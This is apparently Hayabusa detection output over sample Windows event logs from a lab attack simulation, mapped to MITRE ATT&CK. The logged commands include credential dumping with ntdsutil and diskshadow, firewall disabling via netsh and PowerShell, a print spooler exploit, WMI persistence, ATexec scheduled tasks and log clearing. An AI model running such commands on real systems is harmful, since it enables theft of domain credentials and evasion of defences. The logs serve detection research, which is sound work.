22:06:06.161 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,"] Waiting for client..`n"" $PipeObject.WaitForConnection() } else { try { # Add a 1s time-out in case the server is not live $PipeObject.Connect($timeout) } catch { echo ""[!] 
Server pipe not available!"" Return } } $PipeReader = $PipeWriter = $null $PipeReader = new-object System.IO.StreamReader($PipeObject) $PipeWriter = new-object System.IO.StreamWriter($PipeObject) $PipeWriter.AutoFlush = $true Initialize-Session }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 22:06:07.154 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Output): ""Write-Output"" ParameterBinding(Write-Output): name=""InputObject""; value=""[!] Server pipe not available!""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 22:06:07.154 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""+----------------------------------- | Host Name : JUMP01 | Named Pipe : eventlog_svc | AES Key : aaaabbbbccccdddd | Timeout : 1000 +-----------------------------------"" ParameterBinding(Out-Default): name=""InputObject""; value=""[!] 
Server pipe not available!""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 22:06:07.156 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 22:06:07.157 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 22:06:27.069 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 22:06:27.070 +09:00,jump01.offsec.lan,4104,info,,PwSh Scriptblock Log,Invoke-PipeShell -mode client -server localhost -aeskey aaaabbbbccccdddd -pipe eventlog_svc -timeout 1000 -c ls,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 
22:06:27.073 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.IO.Pipes.NamedPipeClientStream"" ParameterBinding(New-Object): name=""ArgumentList""; value=""localhost, eventlog_svc, InOut, None, Impersonation""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 22:06:28.071 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Write-Output): ""Write-Output"" ParameterBinding(Write-Output): name=""InputObject""; value=""[!] Server pipe not available!""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-03 22:06:28.072 +09:00,jump01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""+----------------------------------- | Host Name : JUMP01 | Named Pipe : eventlog_svc | AES Key : aaaabbbbccccdddd | Timeout : 1000 +-----------------------------------"" ParameterBinding(Out-Default): name=""InputObject""; value=""[!] 
Server pipe not available!""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.001-PowerShell/ID800-4103-Interactive PipeShell over named pipe (server and client).evtx +2021-06-04 02:42:33.379 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Resolve-Path): ""Resolve-Path"" ParameterBinding(Resolve-Path): name=""ErrorAction""; value=""Ignore"" ParameterBinding(Resolve-Path): name=""WarningAction""; value=""Ignore"" ParameterBinding(Resolve-Path): name=""InformationAction""; value=""Ignore"" ParameterBinding(Resolve-Path): name=""Verbose""; value=""False"" ParameterBinding(Resolve-Path): name=""Debug""; value=""False"" ParameterBinding(Resolve-Path): name=""Path""; value=""Net*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx +2021-06-04 02:42:35.914 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx +2021-06-04 02:42:35.915 +09:00,fs01.offsec.lan,4104,info,,PwSh Scriptblock Log,Add-PrinterPort -Name .\NetshHelperBeacon.dll,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx +2021-06-04 02:42:35.939 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline 
Execution,"CommandInvocation(Add-PrinterPort): ""Add-PrinterPort"" ParameterBinding(Add-PrinterPort): name=""Name""; value="".\NetshHelperBeacon.dll"" ParameterBinding(Add-PrinterPort): name=""ComputerName""; value="""" ParameterBinding(Add-PrinterPort): name=""HostName""; value="""" ParameterBinding(Add-PrinterPort): name=""PrinterName""; value="""" ParameterBinding(Add-PrinterPort): name=""PrinterHostAddress""; value="""" ParameterBinding(Add-PrinterPort): name=""PortNumber""; value=""0"" ParameterBinding(Add-PrinterPort): name=""SNMP""; value=""0"" ParameterBinding(Add-PrinterPort): name=""SNMPCommunity""; value="""" ParameterBinding(Add-PrinterPort): name=""LprHostAddress""; value="""" ParameterBinding(Add-PrinterPort): name=""LprQueueName""; value="""" ParameterBinding(Add-PrinterPort): name=""LprByteCounting""; value=""False"" ParameterBinding(Add-PrinterPort): name=""ThrottleLimit""; value=""0"" ParameterBinding(Add-PrinterPort): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx +2021-06-04 02:42:35.939 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1574-Hijack Execution Flow/ID800-4103-4104-Print spooler privilege escalation (CVE-2020-1048).evtx +2021-06-04 03:34:12.671 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair 
Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,info,,PwSh Scriptblock Log,"Set-NetFirewallProfile -Profile Domain, Public, Private -Enabled False",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-04 03:34:12.672 +09:00,fs01.offsec.lan,4104,high,Evas,Windows Firewall Profile Disabled,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-04 03:34:12.887 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-NetFirewallProfile): ""Set-NetFirewallProfile"" ParameterBinding(Set-NetFirewallProfile): name=""Name""; value=""Domain, Public, Private"" ParameterBinding(Set-NetFirewallProfile): name=""Enabled""; value=""False"" ParameterBinding(Set-NetFirewallProfile): name=""All""; value=""False"" ParameterBinding(Set-NetFirewallProfile): name=""PolicyStore""; value="""" ParameterBinding(Set-NetFirewallProfile): name=""GPOSession""; value="""" ParameterBinding(Set-NetFirewallProfile): name=""LogFileName""; value="""" ParameterBinding(Set-NetFirewallProfile): name=""LogMaxSizeKilobytes""; value=""0"" ParameterBinding(Set-NetFirewallProfile): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-NetFirewallProfile): name=""AsJob""; value=""False"" ParameterBinding(Set-NetFirewallProfile): name=""PassThru""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or 
Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-04 03:34:12.888 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-04 03:34:12.889 +09:00,fs01.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-04 03:34:12.895 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID800-4103-Firewall disabled.evtx +2021-06-04 04:17:44.873 +09:00,fs01.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-04 04:17:46.489 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh a s p state off | Path: C:\Windows\System32\netsh.exe | PID: 0xfa8 | User: admmig | LID: 
0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-04 04:17:46.577 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh advfirewall set privateprofile state off | Path: C:\Windows\System32\netsh.exe | PID: 0x10fc | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-04 04:17:46.666 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh f s o d | Path: C:\Windows\System32\netsh.exe | PID: 0x1598 | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-04 04:17:47.699 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh firewall set opmode disable | Path: C:\Windows\System32\netsh.exe | PID: 0x1504 | User: admmig | LID: 0x46b7b4,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4688-5447-4950-Firewall disabled (command).evtx +2021-06-04 04:39:52.893 +09:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced 
Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-04 04:39:52.895 +09:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-04 04:39:53.056 +09:00,fs01.offsec.lan,2003,low,,Setting Change in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID2003-4950-Firewall disabled.evtx +2021-06-04 17:41:47.982 +09:00,exchange01.offsec.lan,6,high,Persis,Failed MSExchange Transport Agent Installation,,../hayabusa-rules/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx +2021-06-04 17:41:48.041 +09:00,exchange01.offsec.lan,6,high,Persis,Failed MSExchange Transport Agent Installation,,../hayabusa-rules/sigma/builtin/msexchange/win_exchange_transportagent_failed.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID6-Failed to install an Exchange transport agent.evtx +2021-06-04 18:30:48.170 +09:00,exchange01.offsec.lan,11,info,,File Created,Path: E:\Exchange2016\TransportRoles\Shared\agents.config | Process: C:\Program Files (x86)\Notepad++\notepad++.exe | PID: 19108 | PGUID: 
6D3C60FE-F13D-60B9-22E2-010000001D00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505-Server Software Component/ID11-Exchange transport config modified.evtx +2021-06-06 04:35:16.721 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: ntdsutil.exe 'ac i ntds' 'ifm' 'create full c:\hacker' q q | Path: C:\Windows\System32\ntdsutil.exe | PID: 0x724 | User: admmig | LID: 0xa8a1627a,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx +2021-06-06 04:36:32.683 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ntdsutil ""activate instance ntds"" ifm ""create full c:\hacker"" quit quit | Path: C:\Windows\System32\ntdsutil.exe | PID: 0x1bec | User: admmig | LID: 0xa8a1627a",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-IFM created.evtx +2021-06-06 05:17:05.433 +09:00,rootdc1.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: diskshadow.exe /s shadow.txt | Path: C:\Windows\System32\diskshadow.exe | PID: 0xda8 | User: admmig | LID: 0xa8a1627a,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4688-Diskshadow abuse.evtx +2021-06-10 04:29:58.239 +09:00,fs01.offsec.lan,20,medium,,WMI Event Consumer Activity,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Type: Command Line | Name: ""Evil"" | Dst: ""cmd.exe /c echo %ProcessId% >> c:\\\\temp\\\\log.txt"" | User: 
OFFSEC\admmig",../hayabusa-rules/hayabusa/sysmon/alerts/20_WmiEventConsumerActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx +2021-06-10 04:29:58.240 +09:00,fs01.offsec.lan,19,medium,,WMI Event Filter Activity_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Namespace: ""root/cimv2"" | Name: ""Evil"" | Query: ""SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"" | User: OFFSEC\admmig",../hayabusa-rules/hayabusa/sysmon/alerts/19_WmiEventFilterActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx +2021-06-10 04:29:58.392 +09:00,fs01.offsec.lan,19,medium,,WMI Event Filter Activity_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Created | Namespace: ""root/cimv2"" | Name: ""Evil"" | Query: ""SELECT * FROM Win32_ProcessStartTrace WHERE ProcessName='notepad.exe'"" | User: OFFSEC\admmig",../hayabusa-rules/hayabusa/sysmon/alerts/19_WmiEventFilterActivity_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID19-20-WMI registration via PowerLurk.evtx +2021-06-10 23:12:46.042 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadline): ""PSConsoleHostReadline""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID800-4103-4104-WMI registration via PowerLurk.evtx +2021-06-10 23:12:46.058 +09:00,fs01.offsec.lan,4104,info,,PwSh Scriptblock Log,"c:\\temp\\log.txt"" -Trigger ProcessStart -ProcessName 
notepad.exe",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID800-4103-4104-WMI registration via PowerLurk.evtx +2021-06-10 23:12:46.157 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-WmiInstance): ""Set-WmiInstance"" ParameterBinding(Set-WmiInstance): name=""Namespace""; value=""root/subscription"" ParameterBinding(Set-WmiInstance): name=""Class""; value=""CommandLineEventConsumer"" ParameterBinding(Set-WmiInstance): name=""Arguments""; value=""System.Collections.Hashtable""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID800-4103-4104-WMI registration via PowerLurk.evtx +2021-06-10 23:12:46.177 +09:00,fs01.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-WmiInstance): ""Set-WmiInstance"" ParameterBinding(Set-WmiInstance): name=""Namespace""; value=""root/subscription"" ParameterBinding(Set-WmiInstance): name=""Class""; value=""__EventFilter"" ParameterBinding(Set-WmiInstance): name=""Arguments""; value=""System.Collections.Hashtable""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID800-4103-4104-WMI registration via PowerLurk.evtx +2021-06-11 06:21:20.636 +09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x5a4175e,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.357 
+09:00,fs01.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.357 +09:00,fs01.offsec.lan,4624,medium,LatMov,Pass the Hash Activity 2,,../hayabusa-rules/sigma/builtin/security/win_pass_the_hash_2.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.383 +09:00,fs01.offsec.lan,4698,info,,Task Created,"Name: \bouWFQYO | Content: 2015-07-15T20:35:13.2757294 true 1 S-1-5-18 HighestAvailable InteractiveToken IgnoreNew false false true false true false true true true false false P3D 7 cmd.exe /C whoami > %windir%\Temp\bouWFQYO.tmp 2>&1 \bouWFQYO | User: admmig | LID: 0x5a419bc",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. 
arg.).evtx +2021-06-11 06:21:26.383 +09:00,fs01.offsec.lan,4698,info,,Task Created,"Name: \bouWFQYO | Content: 2015-07-15T20:35:13.2757294 true 1 S-1-5-18 HighestAvailable InteractiveToken IgnoreNew false false true false true false true true true false false P3D 7 cmd.exe /C whoami > %windir%\Temp\bouWFQYO.tmp 2>&1 \bouWFQYO | User: admmig | LID: 0x5a419bc",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.390 +09:00,fs01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /C whoami > C:\Windows\Temp\bouWFQYO.tmp 2>&1 | Path: C:\Windows\System32\cmd.exe | PID: 0x3d0 | User: FS01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,info,,Task Deleted,Name: \bouWFQYO | User: admmig | LID: 0x5a419bc,../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. arg.).evtx +2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,../hayabusa-rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by ATexec (susp. 
arg.).evtx +2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,info,,Task Deleted,Name: \bouWFQYO | User: admmig | LID: 0x5a419bc,../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.406 +09:00,fs01.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,../hayabusa-rules/sigma/builtin/security/win_scheduled_task_deletion.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID5145-Remote schedule task creation (ATexec).evtx +2021-06-11 06:21:26.415 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 0x5a41984,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,4698,4699,5145,4624-ATexec remote trask creation (GLOBAL).evtx" +2021-06-11 06:21:29.427 +09:00,fs01.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\bouWFQYO.tmp | IP Addr: 10.23.123.11 | LID: 
